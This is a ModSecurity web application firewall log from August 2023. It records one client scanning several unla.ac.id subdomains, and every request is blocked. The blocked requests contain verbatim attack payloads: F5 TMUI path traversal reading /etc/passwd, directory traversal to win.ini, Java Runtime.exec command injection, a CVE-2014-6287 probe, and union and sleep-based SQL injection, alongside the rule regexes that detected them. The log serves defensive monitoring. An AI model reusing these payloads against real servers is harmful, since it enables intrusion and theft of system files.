[Tue Aug 29 11:30:52.387070 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fMCo-f0AAAOKNrwAAAAK"]
[Tue Aug 29 11:30:52.389252 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fMCo-f0AAAOOuacAAAAW"]
[Tue Aug 29 11:30:52.404154 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x00{. found within ARGS:search: =\\x00{.cookie|df0T6L|value=CVE-2014-6287.}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO10fMCo-f0AAAPRNdIAAAAf"]
[Tue Aug 29 11:30:52.405437 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x00{. found within ARGS:search: =\\x00{.cookie|df0T6L|value=CVE-2014-6287.}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO10fMCo-f0AAAPxBVgAAAAS"]
[Tue Aug 29 11:30:53.307754 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10fcCo-f0AAAPMmDwAAAAY"]
[Tue Aug 29 11:30:53.310318 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/f5-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fcCo-f0AAAPPSyoAAAAd"]
[Tue Aug 29 11:30:53.311349 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/f5-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fcCo-f0AAAOKNr0AAAAK"]
[Tue Aug 29 11:30:53.328469 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/f5-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fcCo-f0AAAPMmD0AAAAY"]
[Tue Aug 29 11:30:53.331043 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/f5-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fcCo-f0AAAOOuakAAAAW"]
[Tue Aug 29 11:30:53.342884 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/f5-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fcCo-f0AAAOM4aMAAAAU"]
[Tue Aug 29 11:30:53.374279 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x00{. found within ARGS:search: =\\x00{.cookie|df0T6L|value=CVE-2014-6287.}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO10fcCo-f0AAAOM4aQAAAAU"]
[Tue Aug 29 11:30:53.456863 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]: name[#this.getclass().forname(java.lang.runtime).getruntime().exec(cat/etc/passwd)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/account"] [unique_id "ZO10fcCo-f0AAAPPSywAAAAd"]
[Tue Aug 29 11:30:53.498601 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]: name[#this.getclass().forname(java.lang.runtime).getruntime().exec(cat/etc/passwd)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/account"] [unique_id "ZO10fcCo-f0AAAPDn1oAAAAP"]
[Tue Aug 29 11:30:53.510054 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]: name[#this.getclass().forname(java.lang.runtime).getruntime().exec(cat/etc/passwd)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/account"] [unique_id "ZO10fcCo-f0AAAOOua0AAAAW"]
[Tue Aug 29 11:30:53.560578 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]: name[#this.getclass().forname(java.lang.runtime).getruntime().exec(cat/etc/passwd)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/account"] [unique_id "ZO10fcCo-f0AAAPPSy0AAAAd"]
[Tue Aug 29 11:30:54.316423 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\\\/Windows\\\\/win.ini')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: [#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type  found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c\\x5c/Windows\\x5c\\x5c/win.ini')]: name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c/Windows\\x5c/win.ini')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/account"] [unique_id "ZO10fsCo-f0AAAPDn1wAAAAP"]
[Tue Aug 29 11:30:54.323267 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\\\/Windows\\\\/win.ini')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: [#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type  found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c\\x5c/Windows\\x5c\\x5c/win.ini')]: name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c/Windows\\x5c/win.ini')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/account"] [unique_id "ZO10fsCo-f0AAAOOua4AAAAW"]
[Tue Aug 29 11:30:54.412307 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\\\/Windows\\\\/win.ini')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: [#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type  found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c\\x5c/Windows\\x5c\\x5c/win.ini')]: name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c/Windows\\x5c/win.ini')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/account"] [unique_id "ZO10fsCo-f0AAAN@5AoAAAAO"]
[Tue Aug 29 11:30:54.417157 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:membergroup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`/*! found within ARGS:membergroup: @`'`/*!50000Union */ /*!50000select */ md5(999999999) -- @`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/member/ajax_membergroup.php"] [unique_id "ZO10fsCo-f0AAAPMmEQAAAAY"]
[Tue Aug 29 11:30:54.436258 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:membergroup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`/*! found within ARGS:membergroup: @`'`/*!50000Union */ /*!50000select */ md5(999999999) -- @`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/member/ajax_membergroup.php"] [unique_id "ZO10fsCo-f0AAAPDn2AAAAAP"]
[Tue Aug 29 11:30:54.466580 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]: name[#this.getclass().forname(java.lang.runtime).getruntime().exec(cat/etc/passwd)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/account"] [unique_id "ZO10fsCo-f0AAAO87@QAAAAF"]
[Tue Aug 29 11:30:54.467406 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\\\/Windows\\\\/win.ini')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: [#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type  found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c\\x5c/Windows\\x5c\\x5c/win.ini')]: name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c/Windows\\x5c/win.ini')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/account"] [unique_id "ZO10fsCo-f0AAAPDn2EAAAAP"]
[Tue Aug 29 11:30:54.488909 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:visitorId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:visitorId: 1331' and sleep(5) or '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO10fsCo-f0AAAOM4a0AAAAU"]
[Tue Aug 29 11:30:54.490637 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:visitorId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:visitorId: 1331' and sleep(5) or '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO10fsCo-f0AAAO87@UAAAAF"]
[Tue Aug 29 11:30:54.508262 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:visitorId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:visitorId: 1331' and sleep(5) or '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO10fsCo-f0AAAPMmEgAAAAY"]
[Tue Aug 29 11:30:54.510290 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:visitorId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:visitorId: 1331' and sleep(5) or '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO10fsCo-f0AAAOM4a4AAAAU"]
[Tue Aug 29 11:30:54.510364 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:visitorId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:visitorId: 1331' and sleep(5) or '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO10fsCo-f0AAAN@5A4AAAAO"]
[Tue Aug 29 11:30:55.304736 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:membergroup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`/*! found within ARGS:membergroup: @`'`/*!50000Union */ /*!50000select */ md5(999999999) -- @`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/member/ajax_membergroup.php"] [unique_id "ZO10f8Co-f0AAAPMmEkAAAAY"]
[Tue Aug 29 11:30:55.306720 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:membergroup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`/*! found within ARGS:membergroup: @`'`/*!50000Union */ /*!50000select */ md5(999999999) -- @`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/member/ajax_membergroup.php"] [unique_id "ZO10f8Co-f0AAAP05G8AAAAA"]
